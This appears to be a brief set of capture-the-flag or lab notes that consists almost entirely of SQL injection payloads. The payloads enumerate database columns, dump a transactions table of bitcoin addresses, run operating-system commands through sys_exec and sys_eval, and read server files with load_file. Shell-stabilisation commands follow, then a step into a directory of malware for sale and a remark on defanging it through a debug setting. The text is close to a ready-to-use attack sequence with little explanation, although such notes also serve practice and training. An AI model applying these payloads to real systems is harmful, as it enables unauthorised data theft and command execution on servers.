' union select null,null,null,column_name,null from information_schema.columns where table_name='transactions' -- //
' union select null,null,null,null,group_concat(transaction_number, '::', bcoin_sender_address, '::', bcoin_recipient_address,'\n') from transactions -- //
' union select null,null,null,sys_exec('touch /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,sys_eval('ls -al /home/receipts/ > /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,load_file('/var/lib/mysql/my_file.txt'),null -- // verify that our command able to load the file
' union select null,null,null,load_file('/home/receipts/3000000.txt.gpg'),null -- //
If you use Burp the output will be nicer to copy over.
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
cd /home/products/malware/4sale/pal4t1n3/MisterMeist3r/2DC6C0
After reading the code I saw that we can defang the code just by changing the config.ini file fto debug=true so we can run the code without having to worry about what will happen.